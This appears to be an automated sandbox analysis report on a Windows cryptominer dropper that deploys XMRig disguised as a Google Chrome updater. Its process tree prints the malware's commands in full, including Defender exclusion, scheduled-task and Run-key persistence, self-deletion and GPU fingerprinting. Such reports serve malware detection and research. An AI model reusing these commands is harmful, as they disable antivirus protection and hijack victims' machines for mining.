Overview
overview
10Static
static
3qM5GMXBk6h...6).exe
windows7-x64
10qM5GMXBk6h...6).exe
windows10-2004-x64
10qM5GMXBk6h... K.exe
windows7-x64
10qM5GMXBk6h... K.exe
windows10-2004-x64
10qM5GMXBk6h...7).exe
windows7-x64
10qM5GMXBk6h...7).exe
windows10-2004-x64
10qM5GMXBk6h...8).exe
windows7-x64
10qM5GMXBk6h...8).exe
windows10-2004-x64
10qM5GMXBk6h...9).exe
windows7-x64
10qM5GMXBk6h...9).exe
windows10-2004-x64
10qM5GMXBk6h...0).exe
windows7-x64
10qM5GMXBk6h...0).exe
windows10-2004-x64
10qM5GMXBk6h...1).exe
windows7-x64
10qM5GMXBk6h...1).exe
windows10-2004-x64
10qM5GMXBk6h...2).exe
windows7-x64
10qM5GMXBk6h...2).exe
windows10-2004-x64
10qM5GMXBk6h...3).exe
windows7-x64
10qM5GMXBk6h...3).exe
windows10-2004-x64
10qM5GMXBk6h...4).exe
windows7-x64
10qM5GMXBk6h...4).exe
windows10-2004-x64
10qM5GMXBk6h...5).exe
windows7-x64
10qM5GMXBk6h...5).exe
windows10-2004-x64
10qM5GMXBk6h...6).exe
windows7-x64
10qM5GMXBk6h...6).exe
windows10-2004-x64
10qM5GMXBk6h...7).exe
windows7-x64
10qM5GMXBk6h...7).exe
windows10-2004-x64
10qM5GMXBk6h...8).exe
windows7-x64
10qM5GMXBk6h...8).exe
windows10-2004-x64
10qM5GMXBk6h...9).exe
windows7-x64
10qM5GMXBk6h...9).exe
windows10-2004-x64
10qM5GMXBk6h...0).exe
windows7-x64
10qM5GMXBk6h...0).exe
windows10-2004-x64
10Resubmissions
21-07-2024 20:17
240721-y27lvsvfll 1006-06-2024 10:00
240606-l14glacf9x 1006-06-2024 10:00
240606-l12yrscf9w 1006-06-2024 09:56
240606-lyrd9acf71 1006-06-2024 09:55
240606-lx1xascf7v 1006-06-2024 09:55
240606-lxyf6scf7t 1006-06-2024 09:35
240606-lkvvhsce2y 1006-06-2024 09:32
240606-lhs8xacd7v 1006-06-2024 09:32
240606-lhsx5sdd47 10Analysis
-
max time kernel
338s -
max time network
1792s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-12-2023 12:01
Static task
static1
Behavioral task
behavioral1
Sample
qM5GMXBk6hJE6Y5e (16).exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
qM5GMXBk6hJE6Y5e (16).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
qM5GMXBk6hJE6Y5e (17) - K.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
qM5GMXBk6hJE6Y5e (17) - K.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
qM5GMXBk6hJE6Y5e (17).exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
qM5GMXBk6hJE6Y5e (17).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
qM5GMXBk6hJE6Y5e (18).exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
qM5GMXBk6hJE6Y5e (18).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
qM5GMXBk6hJE6Y5e (19).exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
qM5GMXBk6hJE6Y5e (19).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
qM5GMXBk6hJE6Y5e (20).exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
qM5GMXBk6hJE6Y5e (20).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
qM5GMXBk6hJE6Y5e (21).exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
qM5GMXBk6hJE6Y5e (21).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
qM5GMXBk6hJE6Y5e (22).exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
qM5GMXBk6hJE6Y5e (22).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
qM5GMXBk6hJE6Y5e (23).exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
qM5GMXBk6hJE6Y5e (23).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
qM5GMXBk6hJE6Y5e (24).exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
qM5GMXBk6hJE6Y5e (24).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
qM5GMXBk6hJE6Y5e (25).exe
Resource
win7-20231129-en
Behavioral task
behavioral22
Sample
qM5GMXBk6hJE6Y5e (25).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
qM5GMXBk6hJE6Y5e (26).exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
qM5GMXBk6hJE6Y5e (26).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
qM5GMXBk6hJE6Y5e (27).exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
qM5GMXBk6hJE6Y5e (27).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
qM5GMXBk6hJE6Y5e (28).exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
qM5GMXBk6hJE6Y5e (28).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
qM5GMXBk6hJE6Y5e (29).exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
qM5GMXBk6hJE6Y5e (29).exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
qM5GMXBk6hJE6Y5e (30).exe
Resource
win7-20231215-en
General
-
Target
qM5GMXBk6hJE6Y5e (19).exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1808 created 1140 1808 qM5GMXBk6hJE6Y5e (19).exe 18 PID 1808 created 1140 1808 qM5GMXBk6hJE6Y5e (19).exe 18 PID 1808 created 1140 1808 qM5GMXBk6hJE6Y5e (19).exe 18 PID 1808 created 1140 1808 qM5GMXBk6hJE6Y5e (19).exe 18 PID 2944 created 1140 2944 updater.exe 18 PID 2944 created 1140 2944 updater.exe 18 PID 2944 created 1140 2944 updater.exe 18 PID 2944 created 1140 2944 updater.exe 18 PID 1452 created 1140 1452 conhost.exe 18 PID 2944 created 1140 2944 updater.exe 18 -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral9/memory/2928-69-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-93-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-95-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-97-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-99-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-101-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral9/memory/2928-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2544 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2944 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 1576 taskeng.exe -
resource yara_rule behavioral9/memory/2928-65-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-69-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-93-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-95-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-97-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-99-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-101-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral9/memory/2928-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2944 set thread context of 1452 2944 updater.exe 51 PID 2944 set thread context of 2928 2944 updater.exe 46 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe qM5GMXBk6hJE6Y5e (19).exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2864 schtasks.exe 2816 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1260 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a02782607f36da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1808 qM5GMXBk6hJE6Y5e (19).exe 1808 qM5GMXBk6hJE6Y5e (19).exe 2096 powershell.exe 1808 qM5GMXBk6hJE6Y5e (19).exe 1808 qM5GMXBk6hJE6Y5e (19).exe 2556 powershell.exe 1808 qM5GMXBk6hJE6Y5e (19).exe 1808 qM5GMXBk6hJE6Y5e (19).exe 1808 qM5GMXBk6hJE6Y5e (19).exe 1808 qM5GMXBk6hJE6Y5e (19).exe 2548 powershell.exe 2944 updater.exe 2944 updater.exe 352 powershell.exe 2944 updater.exe 2944 updater.exe 1592 powershell.exe 2944 updater.exe 2944 updater.exe 2944 updater.exe 2944 updater.exe 1452 conhost.exe 1452 conhost.exe 2944 updater.exe 2944 updater.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 352 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 2944 updater.exe Token: SeAssignPrimaryTokenPrivilege 1260 WMIC.exe Token: SeIncreaseQuotaPrivilege 1260 WMIC.exe Token: SeSecurityPrivilege 1260 WMIC.exe Token: SeTakeOwnershipPrivilege 1260 WMIC.exe Token: SeLoadDriverPrivilege 1260 WMIC.exe Token: SeSystemtimePrivilege 1260 WMIC.exe Token: SeBackupPrivilege 1260 WMIC.exe Token: SeRestorePrivilege 1260 WMIC.exe Token: SeShutdownPrivilege 1260 WMIC.exe Token: SeSystemEnvironmentPrivilege 1260 WMIC.exe Token: SeUndockPrivilege 1260 WMIC.exe Token: SeManageVolumePrivilege 1260 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1260 WMIC.exe Token: SeIncreaseQuotaPrivilege 1260 WMIC.exe Token: SeSecurityPrivilege 1260 WMIC.exe Token: SeTakeOwnershipPrivilege 1260 WMIC.exe Token: SeLoadDriverPrivilege 1260 WMIC.exe Token: SeSystemtimePrivilege 1260 WMIC.exe Token: SeBackupPrivilege 1260 WMIC.exe Token: SeRestorePrivilege 1260 WMIC.exe Token: SeShutdownPrivilege 1260 WMIC.exe Token: SeSystemEnvironmentPrivilege 1260 WMIC.exe Token: SeUndockPrivilege 1260 WMIC.exe Token: SeManageVolumePrivilege 1260 WMIC.exe Token: SeLockMemoryPrivilege 2928 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2556 wrote to memory of 2816 2556 powershell.exe 31 PID 2556 wrote to memory of 2816 2556 powershell.exe 31 PID 2556 wrote to memory of 2816 2556 powershell.exe 31 PID 2544 wrote to memory of 2628 2544 cmd.exe 32 PID 2544 wrote to memory of 2628 2544 cmd.exe 32 PID 2544 wrote to memory of 2628 2544 cmd.exe 32 PID 2548 wrote to memory of 2564 2548 powershell.exe 33 PID 2548 wrote to memory of 2564 2548 powershell.exe 33 PID 2548 wrote to memory of 2564 2548 powershell.exe 33 PID 1576 wrote to memory of 2944 1576 taskeng.exe 34 PID 1576 wrote to memory of 2944 1576 taskeng.exe 34 PID 1576 wrote to memory of 2944 1576 taskeng.exe 34 PID 1592 wrote to memory of 2864 1592 powershell.exe 52 PID 1592 wrote to memory of 2864 1592 powershell.exe 52 PID 1592 wrote to memory of 2864 1592 powershell.exe 52 PID 2944 wrote to memory of 1452 2944 updater.exe 51 PID 1444 wrote to memory of 1260 1444 cmd.exe 47 PID 1444 wrote to memory of 1260 1444 cmd.exe 47 PID 1444 wrote to memory of 1260 1444 cmd.exe 47 PID 2944 wrote to memory of 2928 2944 updater.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (19).exe"C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (19).exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e (19).exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1492
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2816
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2628
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC1⤵PID:2564
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944
-
C:\Windows\system32\taskeng.exetaskeng.exe {34967AAD-ACAF-49DE-845F-309512E1773A} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1576
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD5958f8e823fd733100862c662ec3ef71c
SHA144740f583b7fe776b237a52b8f81122e6e24f436
SHA2564045401a93d26fd62986935ba0673d6427bade8d1f64153c8047b268a3287f1c
SHA512dfdb7b90d4e9817e38354304360a0609631df0050165da4ac5bfd9b1aaf2b22029f71e4740d7b2487cb36f9369f0586c08401bb70b967d990c319a2231eec216
-
Filesize
134KB
MD5f7240934a17748c3e18e7ddd7e044ddb
SHA1f7c54dbfb9de5f246db10719fee5342c50da0bae
SHA256e086ad9c2d589947b9db923b4e08a8d9f7da680be080307cc55905a9b276d895
SHA5122becf56bb291fe21fa79748b48cc279aecd40f24f9184720fb7d313af8c9c58eff6558d0422665a070002dce657d26d4600212b580e5a399c9a399d60def1c2d
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d6796c1acd21725e2c892e4ccfd04bd0
SHA1212711c39fec7bc6d459661a3d3e5caa2af16233
SHA2561a1a172d8cddcaa6585a53ddc2951d52699736f7f22f113dc51cbcf8f043621c
SHA512e690a27e392b98137b2d4487994463822477b803a1567f6b8d3d4114c5820eec46dfb281cb8c80aac9d833c61de38f53b3e32d4a92bf810da0903210e4da7ad4
-
Filesize
129KB
MD5b79f98b8d026cb3dd6dc3593578e129e
SHA12bf3afef6ab296d719126e30d12961ded06d119d
SHA256c4b26789b2f6d5c612ca84d6a97027dbd8a5b70685e8208dc862406dd89087ed
SHA51279cced0880e33332e9916f36425586882009483253d0df6d2a62c37682f41f5a113ed6d4b9bd18700ed77d2c4ff26c26c4fb34932821e7563f04dc9a989bcf6f